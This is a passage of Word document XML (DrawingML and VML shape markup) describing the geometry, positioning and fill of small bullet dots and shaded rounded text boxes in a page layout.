                            <a:gd name="T27" fmla="*/ 8905 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 8929 8905"/>
                            <a:gd name="T31" fmla="*/ 8929 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 8933 8905"/>
                            <a:gd name="T35" fmla="*/ 8933 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 8954 8905"/>
                            <a:gd name="T39" fmla="*/ 8954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84447" id="Freeform 279" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:445.25pt;width:2.45pt;height:2.45pt;z-index:-15513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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,5685790;13335,5685790;11430,5685155;0,5672455;0,5668010;13335,5654675;17780,5654675;31115,5669915;31115,5672455;17780,568579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0339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5608320</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="363220" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="275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16205"/>
                          <a:chOff x="1930" y="8832"/>
                          <a:chExt cx="572" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="276" name="Freeform 278"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="8832"/>
                            <a:ext cx="572" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2480 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 572"/>
                              <a:gd name="T2" fmla="+- 0 9014 8832"/>
                              <a:gd name="T3" fmla="*/ 9014 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 572"/>
                              <a:gd name="T6" fmla="+- 0 9014 8832"/>
                              <a:gd name="T7" fmla="*/ 9014 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 572"/>
                              <a:gd name="T10" fmla="+- 0 9014 8832"/>
                              <a:gd name="T11" fmla="*/ 9014 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 572"/>
                              <a:gd name="T14" fmla="+- 0 8993 8832"/>
                              <a:gd name="T15" fmla="*/ 8993 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 572"/>
                              <a:gd name="T18" fmla="+- 0 8990 8832"/>
                              <a:gd name="T19" fmla="*/ 8990 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 572"/>
                              <a:gd name="T22" fmla="+- 0 8853 8832"/>
                              <a:gd name="T23" fmla="*/ 8853 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 572"/>
                              <a:gd name="T26" fmla="+- 0 8832 8832"/>
                              <a:gd name="T27" fmla="*/ 8832 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2480 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 572"/>
                              <a:gd name="T30" fmla="+- 0 8832 8832"/>
                              <a:gd name="T31" fmla="*/ 8832 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2501 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 572"/>
                              <a:gd name="T34" fmla="+- 0 8853 8832"/>
                              <a:gd name="T35" fmla="*/ 8853 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2501 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 572"/>
                              <a:gd name="T38" fmla="+- 0 8993 8832"/>
                              <a:gd name="T39" fmla="*/ 8993 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2483 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 572"/>
                              <a:gd name="T42" fmla="+- 0 9014 8832"/>
                              <a:gd name="T43" fmla="*/ 9014 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2480 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 572"/>
                              <a:gd name="T46" fmla="+- 0 9014 8832"/>
                              <a:gd name="T47" fmla="*/ 901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2" h="183">
                                <a:moveTo>
                                  <a:pt x="55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50" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="571" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="553" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="55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8832"/>
                            <a:ext cx="57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#x3C;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6" o:spid="_x0000_s2097" style="position:absolute;margin-left:96.5pt;margin-top:441.6pt;width:28.6pt;height:9.15pt;z-index:-15513088;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,8832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">
                <v:shape id="Freeform 278" o:spid="_x0000_s2098" style="position:absolute;left:1930;top:8832;width:572;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="57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uWHMcA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPS2/CMBCE75X6H6yt1FtxoIhHwCCECi238lCl3pZ4&#10;SaLE69R2Q/rv60qVOI5m5hvNfNmZWrTkfGlZQb+XgCDOrC45V3A6bp4mIHxA1lhbJgU/5GG5uL+b&#10;Y6rtlffUHkIuIoR9igqKEJpUSp8VZND3bEMcvYt1BkOULpfa4TXCTS0HSTKSBkuOCwU2tC4oqw7f&#10;RkG1fW6/xu+fzXn68eqGOq92ZvOi1ONDt5qBCNSFW/i//aYVDMYj+DsTj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blhzHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m550,182r-529,l18,182,,161r,-3l,21,21,,550,r21,21l571,161r-18,21l550,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="550,9014;21,9014;18,9014;0,8993;0,8990;0,8853;21,8832;550,8832;571,8853;571,8993;553,9014;550,9014" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 277" o:spid="_x0000_s2099" type="#_x0000_t202" style="position:absolute;left:1930;top:8832;width:5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TbmsYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvZlNPahN3YiUFgqCGNNDj6/Z&#10;Z7Ik+zbNbjX+e1cQehxm5htmtR5tJ040eONYwXOSgiCunDZcK/gqP6ZLED4ga+wck4ILeVjnD5MV&#10;ZtqduaDTIdQiQthnqKAJoc+k9FVDFn3ieuLoHd1gMUQ51FIPeI5w28lZms6lRcNxocGe3hqq2sOf&#10;VbD55uLd/O5+9sWxMGX5kvJ23ir19DhuXkEEGsN/+N7+1ApmiwXczsQj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Tbms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#x3C;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0390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5878195</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="274" name="Freeform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9306 9257"/>
                            <a:gd name="T3" fmla="*/ 9306 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 9306 9257"/>
                            <a:gd name="T7" fmla="*/ 9306 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 9305 9257"/>
                            <a:gd name="T11" fmla="*/ 9305 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 9285 9257"/>
                            <a:gd name="T15" fmla="*/ 9285 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 9278 9257"/>
                            <a:gd name="T19" fmla="*/ 9278 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 9257 9257"/>
                            <a:gd name="T23" fmla="*/ 9257 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 9257 9257"/>
                            <a:gd name="T27" fmla="*/ 9257 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 9282 9257"/>
                            <a:gd name="T31" fmla="*/ 9282 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 9285 9257"/>
                            <a:gd name="T35" fmla="*/ 9285 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 9306 9257"/>
                            <a:gd name="T39" fmla="*/ 930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44133" id="Freeform 275" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:462.85pt;width:2.45pt;height:2.45pt;z-index:-1551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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,5909310;13335,5909310;11430,5908675;0,5895975;0,5891530;13335,5878195;17780,5878195;31115,5894070;31115,5895975;17780,590931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0441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5831840</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="271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1930" y="9184"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="272" name="Freeform 274"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="9184"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2565 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 9367 9184"/>
                              <a:gd name="T3" fmla="*/ 9367 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 657"/>
                              <a:gd name="T6" fmla="+- 0 9367 9184"/>
                              <a:gd name="T7" fmla="*/ 9367 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 657"/>
                              <a:gd name="T10" fmla="+- 0 9366 9184"/>
                              <a:gd name="T11" fmla="*/ 9366 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 657"/>
                              <a:gd name="T14" fmla="+- 0 9346 9184"/>
                              <a:gd name="T15" fmla="*/ 9346 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 657"/>
                              <a:gd name="T18" fmla="+- 0 9342 9184"/>
                              <a:gd name="T19" fmla="*/ 9342 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 657"/>
                              <a:gd name="T22" fmla="+- 0 9206 9184"/>
                              <a:gd name="T23" fmla="*/ 9206 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 657"/>
                              <a:gd name="T26" fmla="+- 0 9184 9184"/>
                              <a:gd name="T27" fmla="*/ 9184 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2565 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 657"/>
                              <a:gd name="T30" fmla="+- 0 9184 9184"/>
                              <a:gd name="T31" fmla="*/ 9184 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2586 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 657"/>
                              <a:gd name="T34" fmla="+- 0 9206 9184"/>
                              <a:gd name="T35" fmla="*/ 9206 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2586 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 657"/>
                              <a:gd name="T38" fmla="+- 0 9346 9184"/>
                              <a:gd name="T39" fmla="*/ 9346 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2568 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 657"/>
                              <a:gd name="T42" fmla="+- 0 9366 9184"/>
                              <a:gd name="T43" fmla="*/ 9366 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2565 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 657"/>
                              <a:gd name="T46" fmla="+- 0 9367 9184"/>
                              <a:gd name="T47" fmla="*/ 936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635" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="656" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="638" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="63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9184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2" o:spid="_x0000_s2100" style="position:absolute;margin-left:96.5pt;margin-top:459.2pt;width:32.85pt;height:9.15pt;z-index:-15512064;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,9184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">
                <v:shape id="Freeform 274" o:spid="_x0000_s2101" style="position:absolute;left:1930;top:9184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6vTMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWsCMRSE74L/ITyhN03MoepqFBEKLdZDVwWPj81z&#10;d3HzsmxS3f77piD0OMzMN8xq07tG3KkLtWcD04kCQVx4W3Np4HR8G89BhIhssfFMBn4owGY9HKww&#10;s/7BX3TPYykShEOGBqoY20zKUFTkMEx8S5y8q+8cxiS7UtoOHwnuGqmVepUOa04LFba0q6i45d/O&#10;QMznZ6VD4UpUn2F/0PuPy2JmzMuo3y5BROrjf/jZfrcG9EzD35l0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6vTMMAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m635,183r-614,l18,182,,162r,-4l,22,21,,635,r21,22l656,162r-18,20l635,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="635,9367;21,9367;18,9366;0,9346;0,9342;0,9206;21,9184;635,9184;656,9206;656,9346;638,9366;635,9367" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 273" o:spid="_x0000_s2102" type="#_x0000_t202" style="position:absolute;left:1930;top:9184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/dmc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Jf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/dmc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0492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6094730</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="270" name="Freeform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9646 9598"/>
                            <a:gd name="T3" fmla="*/ 9646 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 9646 9598"/>
                            <a:gd name="T7" fmla="*/ 9646 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 9646 9598"/>
                            <a:gd name="T11" fmla="*/ 9646 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 9625 9598"/>
                            <a:gd name="T15" fmla="*/ 9625 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 9619 9598"/>
                            <a:gd name="T19" fmla="*/ 9619 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 9598 9598"/>
                            <a:gd name="T23" fmla="*/ 9598 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 9598 9598"/>
                            <a:gd name="T27" fmla="*/ 9598 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 9622 9598"/>
                            <a:gd name="T31" fmla="*/ 9622 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 9625 9598"/>
                            <a:gd name="T35" fmla="*/ 9625 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 9646 9598"/>
                            <a:gd name="T39" fmla="*/ 964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7FCA9" id="Freeform 271" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:479.9pt;width:2.45pt;height:2.45pt;z-index:-1551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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,6125210;13335,6125210;11430,6125210;0,6111875;0,6108065;13335,6094730;17780,6094730;31115,6109970;31115,6111875;17780,612521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0544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6048375</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="471170" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="267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9525"/>
                          <a:chExt cx="742" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="268" name="Freeform 270"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="9524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9707 9525"/>
                              <a:gd name="T3" fmla="*/ 9707 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 742"/>
                              <a:gd name="T6" fmla="+- 0 9707 9525"/>
                              <a:gd name="T7" fmla="*/ 9707 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 742"/>
                              <a:gd name="T10" fmla="+- 0 9706 9525"/>
                              <a:gd name="T11" fmla="*/ 9706 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 742"/>
                              <a:gd name="T14" fmla="+- 0 9686 9525"/>
                              <a:gd name="T15" fmla="*/ 9686 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 742"/>
                              <a:gd name="T18" fmla="+- 0 9683 9525"/>
                              <a:gd name="T19" fmla="*/ 9683 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 742"/>
                              <a:gd name="T22" fmla="+- 0 9546 9525"/>
                              <a:gd name="T23" fmla="*/ 9546 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 742"/>
                              <a:gd name="T26" fmla="+- 0 9525 9525"/>
                              <a:gd name="T27" fmla="*/ 9525 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2650 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 742"/>
                              <a:gd name="T30" fmla="+- 0 9525 9525"/>
                              <a:gd name="T31" fmla="*/ 9525 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2671 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 742"/>
                              <a:gd name="T34" fmla="+- 0 9546 9525"/>
                              <a:gd name="T35" fmla="*/ 9546 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2671 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 742"/>
                              <a:gd name="T38" fmla="+- 0 9686 9525"/>
                              <a:gd name="T39" fmla="*/ 9686 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2653 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 742"/>
                              <a:gd name="T42" fmla="+- 0 9706 9525"/>
                              <a:gd name="T43" fmla="*/ 9706 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2650 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 742"/>
                              <a:gd name="T46" fmla="+- 0 9707 9525"/>
                              <a:gd name="T47" fmla="*/ 970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1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9524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8" o:spid="_x0000_s2103" style="position:absolute;margin-left:96.5pt;margin-top:476.25pt;width:37.1pt;height:9.15pt;z-index:-15511040;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,9525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">
                <v:shape id="Freeform 270" o:spid="_x0000_s2104" style="position:absolute;left:1930;top:9524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zm+MAA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPy4rCMBTdD/gP4QpuBk10IVqNIsLgA0GsfsClubbF&#10;5qY0mVr/3iwEl4fzXq47W4mWGl861jAeKRDEmTMl5xpu17/hDIQPyAYrx6ThRR7Wq97PEhPjnnyh&#10;Ng25iCHsE9RQhFAnUvqsIIt+5GriyN1dYzFE2OTSNPiM4baSE6Wm0mLJsaHAmrYFZY/032rYHU6V&#10;7264t1ecj4/nhzq1v0rrQb/bLEAE6sJX/HHvjYbJNK6NZ+IRkK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9zm+MAAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" path="m720,182r-699,l18,181,,161r,-3l,21,21,,720,r21,21l741,161r-18,20l720,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="720,9707;21,9707;18,9706;0,9686;0,9683;0,9546;21,9525;720,9525;741,9546;741,9686;723,9706;720,9707" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 269" o:spid="_x0000_s2105" type="#_x0000_t202" style="position:absolute;left:1930;top:9524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58rs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bNsD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Hnyu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0595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6318250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="266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9999 9950"/>
                            <a:gd name="T3" fmla="*/ 9999 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 9999 9950"/>
                            <a:gd name="T7" fmla="*/ 9999 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 9998 9950"/>
                            <a:gd name="T11" fmla="*/ 9998 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 9977 9950"/>
                            <a:gd name="T15" fmla="*/ 9977 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 9971 9950"/>
                            <a:gd name="T19" fmla="*/ 9971 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 9950 9950"/>
                            <a:gd name="T23" fmla="*/ 9950 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 9950 9950"/>
                            <a:gd name="T27" fmla="*/ 9950 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 9974 9950"/>
                            <a:gd name="T31" fmla="*/ 9974 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 9977 9950"/>
                            <a:gd name="T35" fmla="*/ 9977 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 9999 9950"/>
                            <a:gd name="T39" fmla="*/ 999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C421D" id="Freeform 267" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:497.5pt;width:2.45pt;height:2.45pt;z-index:-1551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" path="m28,49r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,6349365;13335,6349365;11430,6348730;0,6335395;0,6331585;13335,6318250;17780,6318250;31115,6333490;31115,6335395;17780,634936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0646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6271895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="525145" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="263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9877"/>
                          <a:chExt cx="827" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="264" name="Freeform 266"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="9877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10059 9877"/>
                              <a:gd name="T3" fmla="*/ 10059 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 827"/>
                              <a:gd name="T6" fmla="+- 0 10059 9877"/>
                              <a:gd name="T7" fmla="*/ 10059 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 827"/>
                              <a:gd name="T10" fmla="+- 0 10059 9877"/>
                              <a:gd name="T11" fmla="*/ 10059 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 827"/>
                              <a:gd name="T14" fmla="+- 0 10038 9877"/>
                              <a:gd name="T15" fmla="*/ 10038 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 827"/>
                              <a:gd name="T18" fmla="+- 0 10035 9877"/>
                              <a:gd name="T19" fmla="*/ 10035 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 827"/>
                              <a:gd name="T22" fmla="+- 0 9898 9877"/>
                              <a:gd name="T23" fmla="*/ 9898 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 827"/>
                              <a:gd name="T26" fmla="+- 0 9877 9877"/>
                              <a:gd name="T27" fmla="*/ 9877 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2735 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 827"/>
                              <a:gd name="T30" fmla="+- 0 9877 9877"/>
                              <a:gd name="T31" fmla="*/ 9877 h 183"/>
                              <a:gd name="T32" fmla="+- 0 2756 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 827"/>
                              <a:gd name="T34" fmla="+- 0 9898 9877"/>
                              <a:gd name="T35" fmla="*/ 9898 h 183"/>
                              <a:gd name="T36" fmla="+- 0 2756 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 827"/>
                              <a:gd name="T38" fmla="+- 0 10038 9877"/>
                              <a:gd name="T39" fmla="*/ 10038 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2739 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 827"/>
                              <a:gd name="T42" fmla="+- 0 10059 9877"/>
                              <a:gd name="T43" fmla="*/ 10059 h 183"/>
